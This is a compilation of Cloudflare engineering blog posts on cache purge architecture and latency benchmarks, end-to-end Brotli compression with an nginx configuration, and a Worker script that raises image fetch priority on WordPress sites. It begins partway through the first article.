The reason flexible purge isn’t also fully coreless yet is because it’s a more complex task than “purge this object”; flexible purge requests can end up purging multiple objects–or even entire zones–from cache. They do this through an entirely different process that isn’t coreless compatible, so to make flexible purge fully coreless we would have needed to come up with an entirely new multi-purge mechanism on top of redesigning distribution. We chose instead to start with just purge by URL so we could focus purely on the most impactful improvements, revamping distribution, without reworking the logic a data center uses to actually remove an object from cache.

This is not to say that the flexible purges haven’t benefited from the coreless purge project. Our cache purge API lets users bundle single file and flexible purges in one request, so the API Gateway worker and Purge Ingest worker handle authorization, authentication and payload validation for flexible purges too. Those flexible purges get forwarded directly to our services in core data centers pre-authorized and validated which reduces load on those core data center auth services. As an added benefit, because authorization and validity checks all happen at the edge for all purge types users get much faster feedback when their requests are malformed.

Next steps

While coreless cache purge has come a long way since the part 1 blog post, we’re not done. We continue to work on reducing end-to-end latency even more for purge by URL because we can do better. Alongside improvements to our new distribution system, we’ve also been working on the redesign of flexible purge to make it fully coreless, and we’re really excited to share the results we’re seeing soon. Flexible cache purge is an incredibly popular API and we’re giving its refresh the care and attention it deserves.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/rethinking-cache-purge-architecture/

Part 1: Rethinking Cache Purge, Fast and Scalable Global Cache Invalidation

14/05/2022

There is a famous quote attributed to a Netscape engineer: “There are only two difficult problems in computer science: cache invalidation and naming things.” While naming things does oddly take up an inordinate amount of time, cache invalidation shouldn’t.

In the past we’ve written about Cloudflare’s incredibly fast response times, whether content is cached on our global network or not. If content is cached, it can be served from a Cloudflare cache server, which are distributed across the globe and are generally a lot closer in physical proximity to the visitor. This saves the visitor’s request from needing to go all the way back to an origin server for a response. But what happens when a webmaster updates something on their origin and would like these caches to be updated as well? This is where cache “purging” (also known as “invalidation”) comes in.

Customers thinking about setting up a CDN and caching infrastructure consider questions like:

  • How do different caching invalidation/purge mechanisms compare?
  • How many times a day/hour/minute do I expect to purge content?
  • How quickly can the cache be purged when needed?

This blog will discuss why invalidating cached assets is hard, what Cloudflare has done to make it easy (because we care about your experience as a developer), and the engineering work we’re putting in this year to make the performance and scalability of our purge services the best in the industry.

What makes purging difficult also makes it useful

(i) Scale
The first thing that complicates cache invalidation is doing it at scale. With data centers in over 270 cities around the globe, our most popular users’ assets can be replicated at every corner of our network. This also means that a purge request needs to be distributed to all data centers where that content is cached. When a data center receives a purge request, it needs to locate the cached content to ensure that subsequent visitor requests for that content are not served stale/outdated data. Requests for the purged content should be forwarded to the origin for a fresh copy, which is then re-cached on its way back to the user.

This process repeats for every data center in Cloudflare’s fleet. And due to Cloudflare’s massive network, maintaining this consistency when certain data centers may be unreachable or go offline, is what makes purging at scale difficult.

Making sure that every data center gets the purge command and remains up-to-date with its content logs is only part of the problem. Getting the purge request to data centers quickly so that content is updated uniformly is the next reason why cache invalidation is hard.  

(ii) Speed
When purging an asset, race conditions abound. Requests for an asset can happen at any time, and may not follow a pattern of predictability. Content can also change unpredictably. Therefore, when content changes and a purge request is sent, it must be distributed across the globe quickly. If purging an individual asset, say an image, takes too long, some visitors will be served the new version, while others are served outdated content. This data inconsistency degrades user experience, and can lead to confusion as to which version is the “right” version. Websites can sometimes even break in their entirety due to this purge latency (e.g. by upgrading versions of a non-backwards compatible JavaScript library).

Purging at speed is also difficult when combined with Cloudflare’s massive global footprint. For example, if a purge request is traveling at the speed of light between Tokyo and Cape Town (both cities where Cloudflare has data centers), just the transit alone (no authorization of the purge request or execution) would take over 180ms on average based on submarine cable placement. Purging a smaller network footprint may reduce these speed concerns while making purge times appear faster, but does so at the expense of worse performance for customers who want to make sure that their cached content is fast for everyone.

(iii) Scope
The final thing that makes purge difficult is making sure that only the unneeded web assets are invalidated. Maintaining a cache is important for egress cost savings and response speed. Webmasters’ origins could be knocked over by a thundering herd of requests, if they choose to purge all content needlessly. It’s a delicate balance of purging just enough: too much can result in both monetary and downtime costs, and too little will result in visitors receiving outdated content.

At Cloudflare, what to invalidate in a data center is often dictated by the type of purge. Purge everything, as you could probably guess, purges all cached content associated with a website. Purge by prefix purges content based on a URL prefix. Purge by hostname can invalidate content based on a hostname. Purge by URL or single file purge focuses on purging specified URLs. Finally, Purge by tag purges assets that are marked with Cache-Tag headers. These markers offer webmasters flexibility in grouping assets together. When a purge request for a tag comes into a data center, all assets marked with that tag will be invalidated.

With that overview in mind, the remainder of this blog will focus on putting each element of invalidation together to benchmark the performance of Cloudflare’s purge pipeline and provide context for what performance means in the real-world. We’ll be reviewing how fast Cloudflare can invalidate cached content across the world. This will provide a baseline analysis for how quick our purge systems are presently, which we will use to show how much we will improve by the time we launch our new purge system later this year.

How does purge work currently?

In general, purge takes the following route through Cloudflare’s data centers.

  • A purge request is initiated via the API or UI. This request specifies how our data centers should identify the assets to be purged. This can be accomplished via cache-tag header(s), URL(s), entire hostnames, and much more.
  • The request is received by any Cloudflare data center and is identified to be a purge request. It is then routed to a Cloudflare core data center (a set of a few data centers responsible for network management activities).
  • When a core data center receives it, the request is processed by a number of internal services that (for example) make sure the request is being sent from an account with the appropriate authorization to purge the asset. Following this, the request gets fanned out globally to all Cloudflare data centers using our distribution service.
  • When received by a data center, the purge request is processed and all assets with the matching identification criteria are either located and removed, or marked as stale. These stale assets are not served in response to requests and are instead re-pulled from the origin.
  • After being pulled from the origin, the response is written to cache again, replacing the purged version.

Now let’s look at this process in practice. Below we describe Cloudflare’s purge benchmarking that uses real-world performance data from our purge pipeline.

Benchmarking purge performance design

In order to understand how performant Cloudflare’s purge system is, we measured the time it took from sending the purge request to the moment that the purge is complete and the asset is no longer served from cache.  

In general, the process of measuring purge speeds involves: (i) ensuring that a particular piece of content is cached, (ii) sending the command to invalidate the cache, (iii) simultaneously checking our internal system logs for how the purge request is routed through our infrastructure, and (iv) measuring when the asset is removed from cache (first miss).

This process measures how quickly cache is invalidated from the perspective of an average user.

  • Clock starts
    As noted above, in this experiment we’re using sampled RUM data from our purge systems. The goal of this experiment is to benchmark current data for how long it can take to purge an asset on Cloudflare across different regions. Once the asset was cached in a region on Cloudflare, we identify when a purge request is received for that asset. At that same instant, the clock started for this experiment. We include in this time any retrys that we needed to make (due to data centers missing the initial purge request) to ensure that the purge was done consistently across our network. The clock continues as the request transits our purge pipeline  (data center > core > fanout > purge from all data centers).  
  • Clock stops
    What caused the clock to stop was the purged asset being removed from cache, meaning that the data center is no longer serving the asset from cache to visitor’s requests. Our internal logging measures the precise moment that the cache content has been removed or expired and from that data we were able to determine the following benchmarks for our purge types in various regions.  

Results

We’ve divided our benchmarks in two ways: by purge type and by region.

We singled out Purge by URL because it identifies a single target asset to be purged. While that asset can be stored in multiple locations, the amount of data to be purged is strictly defined.

We’ve combined all other types of purge (everything, tag, prefix, hostname) together because the amount of data to be removed is highly variable. Purging a whole website or by assets identified with cache tags could mean we need to find and remove a multitude of content from many different data centers in our network.

Secondly, we have segmented our benchmark measurements by regions and specifically we confined the benchmarks to specific data center servers in the region because we were concerned about clock skews between different data centers. This is the reason why we limited the test to the same cache servers so that even if there was skew, they’d all be skewed in the same way.  

We took the latency from the representative data centers in each of the following regions and the global latency. Data centers were not evenly distributed in each region, but in total represent about 90 different cities around the world:  

  • Africa
  • Asia Pacific Region (APAC)
  • Eastern Europe (EEUR)
  • Eastern North America (ENAM)
  • Oceania
  • South America (SA)
  • Western Europe (WEUR)
  • Western North America (WNAM)

The global latency numbers represent the purge data from all Cloudflare data centers in over 270 cities globally. In the results below, global latency numbers may be larger than the regional numbers because it represents all of our data centers instead of only a regional portion so outliers and retries might have an outsized effect.

Below are the results for how quickly our current purge pipeline was able to invalidate content by purge type and region. All times are represented in seconds and divided into P50, P75, and P99 quantiles. Meaning for “P50” that 50% of the purges were at the indicated latency or faster.  

Purge By URL

P50P75P99
AFRICA0.95s1.94s6.42s
APAC0.91s1.87s6.34s
EEUR0.84s1.66s6.30s
ENAM0.85s1.71s6.27s
OCEANIA0.95s1.96s6.40s
SA0.91s1.86s6.33s
WEUR0.84s1.68s6.30s
WNAM0.87s1.74s6.25s
GLOBAL1.31s1.80s6.35s

Purge Everything, by Tag, by Prefix, by Hostname

P50P75P99
AFRICA1.42s1.93s4.24s
APAC1.30s2.00s5.11s
EEUR1.24s1.77s4.07s
ENAM1.08s1.62s3.92s
OCEANIA1.16s1.70s4.01s
SA1.25s1.79s4.106s
WEUR1.19s1.73s4.04s
WNAM0.9995s1.53s3.83s
GLOBAL1.57s2.32s5.97s

A general note about these benchmarks — the data represented here was taken from over 48 hours (two days) of RUM purge latency data in May 2022. If you are interested in how quickly your content can be invalidated on Cloudflare, we suggest you test our platform with your website.

Those numbers are good and much faster than most of our competitors. Even in the worst case, we see the time from when you tell us to purge an item to when it is removed globally is less than seven seconds. In most cases, it’s less than a second. That’s great for most applications, but we want to be even faster. Our goal is to get cache purge to as close as theoretically possible to the speed of light limit for a network our size, which is 200ms.

Intriguingly, LEO satellite networks may be able to provide even lower global latency than fiber optics because of the straightness of the paths between satellites that use laser links. We’ve done calculations of latency between LEO satellites that suggest that there are situations in which going to space will be the fastest path between two points on Earth. We’ll let you know if we end up using laser-space-purge.

Just as we have with network performance, we are going to relentlessly measure our cache performance as well as the cache performance of our competitors. We won’t be satisfied until we verifiably are the fastest everywhere. To do that, we’ve built a new cache purge architecture which we’re confident will make us the fastest cache purge in the industry.

Our new architecture

Through the end of 2022, we will continue this blog series incrementally showing how we will become the fastest, most-scalable purge system in the industry. We will continue to update you with how our purge system is developing  and benchmark our data along the way.

Getting there will involve rearchitecting and optimizing our purge service, which hasn’t received a systematic redesign in over a decade. We’re excited to do our development in the open, and bring you along on our journey.

So what do we plan on updating?

Introducing Coreless Purge

The first version of our cache purge system was designed on top of a set of central core services including authorization, authentication, request distribution, and filtering among other features that made it a high-reliability service. These core components had ultimately become a bottleneck in terms of scale and performance as our network continues to expand globally. While most of our purge dependencies have been containerized, the message queue used was still running on bare metals, which led to increased operational overhead when our system needed to scale.

Last summer, we built a proof of concept for a completely decentralized cache invalidation system using in-house tech – Cloudflare Workers and Durable Objects. Using Durable Objects as a queuing mechanism gives us the flexibility to scale horizontally by adding more Durable Objects as needed and can reduce time to purge with quick regional fanouts of purge requests.

In the new purge system we’re ripping out the reliance on core data centers and moving all that functionality to every data center, we’re calling it coreless purge.

Here’s a general overview of how coreless purge will work:

  • A purge request will be initiated via the API or UI. This request will specify how we should identify the assets to be purged.
  • The request will be routed to the nearest Cloudflare data center where it is identified to be a purge request and be passed to a Worker that will perform several of the key functions that currently occur in the core (like authorization, filtering, etc).
  • From there, the Worker will pass the purge request to a Durable Object in the data center. The Durable Object will queue all the requests and broadcast them to every data center when they are ready to be processed.
  • When the Durable Object broadcasts the purge request to every data center, another Worker will pass the request to the service in the data center that will invalidate the content in cache (executes the purge).

We believe this re-architecture of our system built by stringing together multiple services from the Workers platform will help improve both the speed and scalability of the purge requests we will be able to handle.

Conclusion

We’re going to spend a lot of time building and optimizing purge because, if there’s one thing we learned here today, it’s that cache invalidation is a difficult problem but those are exactly the types of problems that get us out of bed in the morning.

If you want to help us optimize our purge pipeline, we’re hiring.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/part1-coreless-purge/

All the way up to 11: Serve Brotli from origin and Introducing Compression Rules

23/06/2023

Throughout Speed Week, we have talked about the importance of optimizing performance. Compression plays a crucial role by reducing file sizes transmitted over the Internet. Smaller file sizes lead to faster downloads, quicker website loading, and an improved user experience.

Take household cleaning products as a real world example. It is estimated “a typical bottle of cleaner is 90% water and less than 10% actual valuable ingredients”. Removing 90% of a typical 500ml bottle of household cleaner reduces the weight from 600g to 60g. This reduction means only a 60g parcel, with instructions to rehydrate on receipt, needs to be sent. Extrapolated into the gallons, this weight reduction soon becomes a huge shipping saving for businesses. Not to mention the environmental impact.

This is how compression works. The sender compresses the file to its smallest possible size, and then sends the smaller file with instructions on how to handle it when received. By reducing the size of the files sent, compression ensures the amount of bandwidth needed to send files over the Internet is a lot less. Where files are stored in expensive cloud providers like AWS, reducing the size of files sent can directly equate to significant cost savings on bandwidth.

Smaller file sizes are also particularly beneficial for end users with limited Internet connections, such as mobile devices on cellular networks or users in areas with slow network speeds.

Cloudflare has always supported compression in the form of Gzip. Gzip is a widely used compression algorithm that has been around since 1992 and provides file compression for all Cloudflare users. However, in 2013 Google introduced Brotli which supports higher compression levels and better performance overall. Switching from gzip to Brotli results in smaller file sizes and faster load times for web pages. We have supported Brotli since 2017 for the connection between Cloudflare and client browsers. Today we are announcing end-to-end Brotli support for web content: support for Brotli compression, at the highest possible levels, from the origin server to the client.

If your origin server supports Brotli, turn it on, crank up the compression level, and enjoy the performance boost.

Brotli compression to 11

Brotli has 12 levels of compression ranging from 0 to 11, with 0 providing the fastest compression speed but the lowest compression ratio, and 11 offering the highest compression ratio but requiring more computational resources and time. During our initial implementation of Brotli five years ago, we identified that compression level 4 offered the balance between bytes saved and compression time without compromising performance.

Since 2017, Cloudflare has been using a maximum compression of Brotli level 4 for all compressible assets based on the end user’s “accept-encoding” header. However, one issue was that Cloudflare only requested Gzip compression from the origin, even if the origin supported Brotli. Furthermore, Cloudflare would always decompress the content received from the origin before compressing and sending it to the end user, resulting in additional processing time. As a result, customers were unable to fully leverage the benefits offered by Brotli compression.

Old world

With Cloudflare now fully supporting Brotli end to end, customers will start seeing our updated accept-encoding header arriving at their origins. Once available customers can transfer, cache and serve heavily compressed Brotli files directly to us, all the way up to the maximum level of 11. This will help reduce latency and bandwidth consumption. If the end user device does not support Brotli compression, we will automatically decompress the file and serve it either in its decompressed format or as a Gzip-compressed file, depending on the Accept-Encoding header.

Full end-to-end Brotli compression support

End user cannot support Brotli compression

Customers can implement Brotli compression at their origin by referring to the appropriate online materials. For example, customers that are using NGINX, can implement Brotli by following this tutorial and setting compression at level 11 within the nginx.conf configuration file as follows:

brotli on;
brotli_comp_level 11;
brotli_static on;
brotli_types text/plain text/css application/javascript application/x-javascript text/xml 
application/xml application/xml+rss text/javascript image/x-icon 
image/vnd.microsoft.icon image/bmp image/svg+xml;

Cloudflare will then serve these assets to the client at the exact same compression level (11) for the matching file brotli_types. This means any SVG or BMP images will be sent to the client compressed at Brotli level 11.

Testing

We applied compression against a simple CSS file, measuring the impact of various compression algorithms and levels. Our goal was to identify potential improvements that users could experience by optimizing compression techniques. These results can be seen in the following table:

TestSize (bytes)% Reduction of original file (Higher % better)
Uncompressed response (no compression used)2,747
Cloudflare default Gzip compression (level 8)1,12159.21%
Cloudflare default Brotli compression (level 4)1,11059.58%
Compressed with max Gzip level (level 9)1,12159.21%
Compressed with max Brotli level (level 11)90966.94%

By compressing Brotli at level 11 users are able to reduce their file sizes by 19% compared to the best Gzip compression level. Additionally, the strongest Brotli compression level is around 18% smaller than the default level used by Cloudflare. This highlights a significant size reduction achieved by utilizing Brotli compression, particularly at its highest levels, which can lead to improved website performance, faster page load times and an overall reduction in egress fees.

To take advantage of higher end to end compression rates the following Cloudflare proxy features need to be disabled.

  • Email Obfuscation
  • Rocket Loader
  • Server Side Excludes (SSE)
  • Mirage
  • HTML Minification – JavaScript and CSS can be left enabled.
  • Automatic HTTPS Rewrites

This is due to Cloudflare needing to decompress and access the body to apply the requested settings. Alternatively a customer can disable these features for specific paths using Configuration Rules.

If any of these rewrite features are enabled, your origin can still send Brotli compression at higher levels. However, we will decompress, apply the Cloudflare feature(s) enabled, and recompress on the fly using Cloudflare’s default Brotli level 4 or Gzip level 8 depending on the user’s accept-encoding header.

For browsers that do not accept Brotli compression, we will continue to decompress and send Gzipped responses or uncompressed.

Implementation

The initial step towards implementing Brotli from the origin involved constructing a decompression module that could be integrated into Cloudflare software stack. It allows us to efficiently convert the compressed bits received from the origin into the original, uncompressed file. This step was crucial as numerous features such as Email Obfuscation and Cloudflare Workers Customers, rely on accessing the body of a response to apply customizations.

We integrated the decompressor into  the core reverse web proxy of Cloudflare. This integration ensured that all Cloudflare products and features could access Brotli decompression effortlessly. This also allowed our Cloudflare Workers team to incorporate Brotli Directly into Cloudflare Workers allowing our Workers customers to be able to interact with responses returned in Brotli or pass through to the end user unmodified.

Introducing Compression rules – Granular control of compression to end users

By default Cloudflare compresses certain content types based on the Content-Type header of the file. Today we are also announcing Compression Rules for our Enterprise Customers to allow you even more control on how and what Cloudflare will compress.

Today we are also announcing the introduction of Compression Rules for our Enterprise Customers. With Compression Rules, you gain enhanced control over Cloudflare’s compression capabilities, enabling you to customize how and which content Cloudflare compresses to optimize your website’s performance.

For example, by using Cloudflare’s Compression Rules for .ktx files, customers can optimize the delivery of textures in webGL applications, enhancing the overall user experience. Enabling compression minimizes the bandwidth usage and ensures that webGL applications load quickly and smoothly, even when dealing with large and detailed textures.

Alternatively customers can disable compression or specify a preference of how we compress. Another example could be an Infrastructure company only wanting to support Gzip for their IoT devices but allow Brotli compression for all other hostnames.

Compression rules use the filters that our other rules products are built on top of with the added fields of Media Type and Extension type. Allowing users to easily specify the content you wish to compress.

Deprecating the Brotli toggle

Brotli has been long supported by some web browsers since 2016 and Cloudflare offered Brotli Support in 2017. As with all new web technologies Brotli was unknown and we gave customers the ability to selectively enable or disable BrotlI via the API and our UI.

Now that Brotli has evolved and is supported by all browsers, we plan to enable Brotli on all zones by default in the coming months. Mirroring the Gzip behavior we currently support and removing the toggle from our dashboard. If browsers do not support Brotli, Cloudflare will continue to support their accepted encoding types such as Gzip or uncompressed and Enterprise customers will still be able to use Compression rules to granularly control how we compress data towards their users.

The future of web compression

We’ve seen great adoption and great performance for Brotli as the new compression technique for the web. Looking forward, we are closely following trends and new compression algorithms such as zstd as a possible next-generation compression algorithm.

At the same time, we’re looking to improve Brotli directly where we can. One development that we’re particularly focused on is shared dictionaries with Brotli. Whenever you compress an asset, you use a “dictionary” that helps the compression to be more efficient. A simple analogy of this is typing OMW into an iPhone message. The iPhone will automatically translate it into On My Way using its own internal dictionary.

OMW
OnMyWay

This internal dictionary has taken three characters and morphed this into nine characters (including spaces) The internal dictionary has saved six characters which equals performance benefits for users.

By default, the Brotli RFC defines a static dictionary that both clients and the origin servers use. The static dictionary was designed to be general purpose and apply to everyone. Optimizing the size of the dictionary as to not be too large whilst able to generate best compression results. However, what if an origin could generate a bespoke dictionary tailored to a specific website? For example a Cloudflare-specific dictionary would allow us to compress the words and phrases that appear repeatedly on our site such as the word “Cloudflare”. The bespoke dictionary would be designed to compress this as heavily as possible and the browser using the same dictionary would be able to translate this back.

new proposal by the Web Incubator CG aims to do just that, allowing you to specify your own dictionaries that browsers can use to allow websites to optimize compression further. We’re excited about contributing to this proposal and plan on publishing our research soon.

Try it now

Compression Rules are available now! With End to End Brotli being rolled out over the coming weeks. Allowing you to improve performance, reduce bandwidth and granularly control how Cloudflare handles compression to your end users.

Watch on Cloudflare TV

https://customer-rhnwzxvb3mg4wz3v.cloudflarestream.com/f1c71fdb05263b5ec3077e6e7acdb7e2/iframe?preload=true&poster=https%3A%2F%2Fcustomer-rhnwzxvb3mg4wz3v.cloudflarestream.com%2Ff1c71fdb05263b5ec3077e6e7acdb7e2%2Fthumbnails%2Fthumbnail.jpg%3Ftime%3D1s%26height%3D600

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/this-is-brotli-from-origin/

Speeding up your (WordPress) website is a few clicks away

22/06/2023

Every day, website visitors spend far too much time waiting for websites to load in their browsers. This waiting is partially due to browsers not knowing which resources are critically important so they can prioritize them ahead of less-critical resources. In this blog we will outline how millions of websites across the Internet can improve their performance by specifying which critical content loads first with Cloudflare Workers and what Cloudflare will do to make this easier by default in the future.

Popular Content Management Systems (CMS) like WordPress have made attempts to influence website resource priority, for example through techniques like lazy loading images. When done correctly, the results are magical. Performance is optimized between the CMS and browser without needing to implement any changes or coding new prioritization strategies. However, we’ve seen that these default priorities have opportunities to improve greatly.

In this co-authored blog with Google’s Patrick Meenan we will explain where the opportunities exist to improve website performance, how to check if a specific site can improve performance, and provide a small JavaScript snippet which can be used with Cloudflare Workers to do this optimization for you.

What happens when a browser receives the response?

Before we dive into where the opportunities are to improve website performance, let’s take a step back to understand how browsers load website assets by default.

After the browser sends a HTTP request to a server, it receives a HTTP response containing information like status codes, headers, and the requested content. The browser carefully analyzes the response’s status code and response headers to ensure proper handling of the content.

Next, the browser processes the content itself. For HTML responses, the browser extracts important information from the <head> section of the HTML, such as the page title, stylesheets, and scripts. Once this information is parsed, the browser moves on to the response <body> which has the actual page content. During this stage, the browser begins to present the webpage to the visitor.

If the response includes additional 3rd party resources like CSS, JavaScript, or other content, the browser may need to fetch and integrate them into the webpage. Typically, browsers like Google Chrome delay loading images until after the resources in the HTML <head> have loaded. This is also known as “blocking” the render of the webpage. However, developers can override this blocking behavior using fetch priority or other methods to boost other content’s priority in the browser. By adjusting an important image’s fetch priority, it can be loaded earlier, which can lead to significant improvements in crucial performance metrics like LCP (Largest Contentful Paint).

Images are so central to web pages that they have become an essential element in measuring website performance from Core Web Vitals. LCP measures the time it takes for the largest visible element, often an image, to be fully rendered on the screen. Optimizing the loading of critical images (like LCP images) can greatly enhance performance, improving the overall user experience and page performance.

But here’s the challenge – a browser may not know which images are the most important for the visitor experience (like the LCP image) until rendering begins. If the developer can identify the LCP image or critical elements before it reaches the browser, its priority can be increased at the server to boost website performance instead of waiting for the browser to naturally discover the critical images.

In our Smart Hints blog, we describe how Cloudflare will soon be able to automatically prioritize content on behalf of website developers, but what happens if there’s a need to optimize the priority of the images right now? How do you know if a website is in a suboptimal state and what can you do to improve?

Using Cloudflare, developers should be able to improve image performance with heuristics that identify likely-important images before the browser parses them so these images can have increased priority and be loaded sooner.

Identifying Image Priority opportunities

Just increasing the fetch priority of all images won’t help if they are lazy-loaded or not critical/LCP images. Lazy-loading is a method that developers use to generally improve the initial load of a webpage if it includes numerous out-of-view elements. For example, on Instagram, when you continually scroll down the application to see more images, it would only make sense to load those images when the user arrives at them otherwise the performance of the page load would be needlessly delayed by the browser eagerly loading these out-of-view images. Instead the highest priority should be given to the LCP image in the viewport to improve performance.

So developers are left in a situation where they need to know which images are on users’ screens/viewports to increase their priority and which are off their screens to lazy-load them.

Recently, we’ve seen attempts to influence image priority on behalf of developers. For example, by default, in WordPress 5.5 all images with an IMG tag and aspect ratios were directed to be lazy-loaded. While there are plugins and other methods WordPress developers can use to boost the priority of LCP images, lazy-loading all images in a default manner and not knowing which are LCP images can cause artificial performance delays in website performance (they’re working on this though, and have partially resolved this for block themes).

So how do we identify the LCP image and other critical assets before they get to the browser?

To evaluate the opportunity to improve image performance, we turned to the HTTP Archive. Out of the approximately 22 million desktop pages tested in February 2023, 46% had an LCP element with an IMG tag. Meaning that for page load metrics, LCP had an image included about half the time. Though, among these desktop pages, 8.5 million had the image in the static HTML delivered with the page, indicating a total potential improvement opportunity of approximately 39% of the desktop pages within the dataset.

In the case of mobile pages, out of the ~28.5 million tested, 40% had an LCP element as an IMG tag. Among these mobile pages, 10.3 million had the image in the static HTML delivered with the page, suggesting a potential improvement opportunity in around 36% of the mobile pages within the dataset.

However, as previously discussed, prioritizing an image won’t be effective if the image is lazy-loaded because the directives are contradictory. In the dataset,  approximately 1.8 million LCP desktop images and 2.4 million LCP mobile images were lazy-loaded.

Therefore, across the Internet, the opportunity to improve image performance would be about ~30% of pages that have an LCP image in the original HTML markup that weren’t lazy-loaded, but with a more advanced Cloudflare Worker, the additional 9% of lazy-loaded LCP images can also be improved improved by removing the lazy-load attribute.

If you’d like to determine which element on your website serves as the LCP element so you can increase the priority or remove any lazy-loading, you can use browser developer tools, or speed tests like Webpagetest or Cloudflare Observatory.

39% of desktop images seems like a lot of opportunity to improve image performance. So the next question is how can Cloudflare determine the LCP image across our network and automatically prioritize them?

Image Index

We thought that how soon the LCP image showed up in the HTML would serve as a useful indicator. So we analyzed the HTTP Archive dataset to see where the cumulative percentage of LCP images are discovered based on their position in the HTML, including lazy-loaded images.

We found that approximately 25% of the pages had the LCP image as the first image in the HTML (around 10% of all pages). Another 25% had the LCP image as the second image. WordPress seemed to arrive at a similar conclusion and recently released a development to remove the default lazy-load attribute from the first image on block themes, but there are opportunities to go further.

Our analysis revealed that implementing a straightforward rule like “do not lazy-load the first four images,” either through the browser, a content management system (CMS), or a Cloudflare Worker could address approximately 75% of the issue of lazy-loading LCP images (example Worker below).

Ignoring small images

In trying to find other ways to identify likely LCP images we next turned to the size of the image. To increase the likelihood of getting the LCP image early in the HTML, we looked into ignoring “small” images as they are unlikely to be big enough to be a LCP element. We explored several sizes and 10,000 pixels (less than 100×100) was a pretty reliable threshold that didn’t skip many LCP images and avoided a good chunk of the non-LCP images.

By ignoring small images (<10,000px), we found that the first image became the LCP image in approximately 30-34% of cases. Adding the second image increased this percentage to 56-60% of pages.

Therefore, to improve image priority, a potential approach could involve assigning a higher priority to the first four “not-small” images.

Chrome 114 Image Prioritization Experiment

An experiment running in Chrome 114 does exactly what we described above. Within the browser there are a few different prioritization knobs to play with that aren’t web-exposed so we have the opportunity to assign a “medium” priority to images that we want to boost automatically (directly controlling priority with “fetch priority” lets you set high or low). This will let us move the images ahead of other images, async scripts and parser-blocking scripts late in the body but still keep the boosted image priority below any high-priority requests, particularly dynamically-injected blocking scripts.

We are experimenting with boosting the priority of varying numbers of images (2, 5 and 10) and with allowing one of those medium-priority images to load at a time during Chromes “tight” mode (when it is loading the render-blocking resources in the head) to increase the likelihood that the LCP image will be available when the first paint is done.

The data is still coming in and no “ship” decisions have been made yet but the early results are very promising, improving the LCP time across the entire web for all arms of the experiment (not by massive amounts but moving the metrics of the whole web is notoriously difficult).

How to use Cloudflare Workers to boost performance

Now that we’ve seen that there is a large opportunity across the Internet for helping prioritize images for performance and how to identify images on individual pages that are likely LCP images, the question becomes, what would the results be of implementing a network-wide rule that could boost image priority from this study?

We built a test worker and deployed it on some WordPress test sites with our friends at Rocket.net, a WordPress hosting platform focused on performance. This worker boosts the priority of the first four images while removing the lazy-load attribute, if present. When deployed we saw good performance results and the expected image prioritization.

export default {
  async fetch(request) {
    const response = await fetch(request);
 
    // Check if the response is HTML
    const contentType = response.headers.get('Content-Type');
    if (!contentType || !contentType.includes('text/html')) {
      return response;
    }
 
    const transformedResponse = transformResponse(response);
 
    // Return the transformed response with streaming enabled
    return transformedResponse;
  },
};
 
async function transformResponse(response) {
  // Create an HTMLRewriter instance and define the image transformation logic
  const rewriter = new HTMLRewriter()
    .on('img', new ImageElementHandler());
 
  const transformedBody = await rewriter.transform(response).text()
 
  const transformresponse = new Response(transformedBody, response)
 
  // Return the transformed response with streaming enabled
  return transformresponse
}
 
class ImageElementHandler {
  constructor() {
    this.imageCount = 0;
    this.processedImages = new Set();
  }
 
  element(element) {
    const imgSrc = element.getAttribute('src');
 
    // Check if the image is small based on Chrome's criteria
    if (imgSrc && this.imageCount < 4 && !this.processedImages.has(imgSrc) && !isImageSmall(element)) {
      element.removeAttribute('loading');
      element.setAttribute('fetchpriority', 'high');
      this.processedImages.add(imgSrc);
      this.imageCount++;
    }
  }
}
 
function isImageSmall(element) {
  // Check if the element has width and height attributes
  const width = element.getAttribute('width');
  const height = element.getAttribute('height');
 
  // If width or height is 0, or width * height < 10000, consider the image as small
  if ((width && parseInt(width, 10) === 0) || (height && parseInt(height, 10) === 0)) {
    return true;
  }
 
  if (width && height) {
    const area = parseInt(width, 10) * parseInt(height, 10);
    if (area < 10000) {
      return true;
    }
  }
 
  return false;
}

When testing the Worker, we saw that default image priority was boosted into “high” for the first four images and the fifth image remained “low.” This resulted in an LCP range of “good” from a speed test. While this initial test is not a dispositive indicator that the Worker will boost performance in every situation, the results are promising and we look forward to continuing to experiment with this idea.

While we’ve experimented with WordPress sites to illustrate the issues and potential performance benefits, this issue is present across the Internet.

Website owners can help us experiment with the Worker above to improve the priority of images on their websites or edit it to be more specific by targeting likely LCP elements. Cloudflare will continue experimenting using a very similar process to understand how to safely implement a network-wide rule to ensure that images are correctly prioritized across the Internet and performance is boosted without the need to configure a specific Worker.

Automatic Platform Optimization

Cloudflare’s Automatic Platform Optimization (APO) is a plugin for WordPress which allows Cloudflare to deliver your entire WordPress site from our network ensuring consistent, fast performance for visitors. By serving cached sites, APO can improve performance metrics. APO does not currently have a way to prioritize images over other assets to improve browser render metrics or dynamically rewrite HTML, techniques we’ve discussed in this post. Although this presents a potential opportunity for future development, it requires thorough testing to ensure safe and reliable support.

In the future we’ll look to include the techniques discussed today as part of APO, however in the meantime we recommend using Snippets (and Experiments) to test with the code example above to see the performance impact on your website.

Get in touch!

If you are interested in using the JavaScript above, we recommended testing with Workers or using Cloudflare Snippets. We’d love to hear from you on what your results were. Get in touch via social media and share your experiences.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/speeding-up-your-website-in-a-few-clicks/

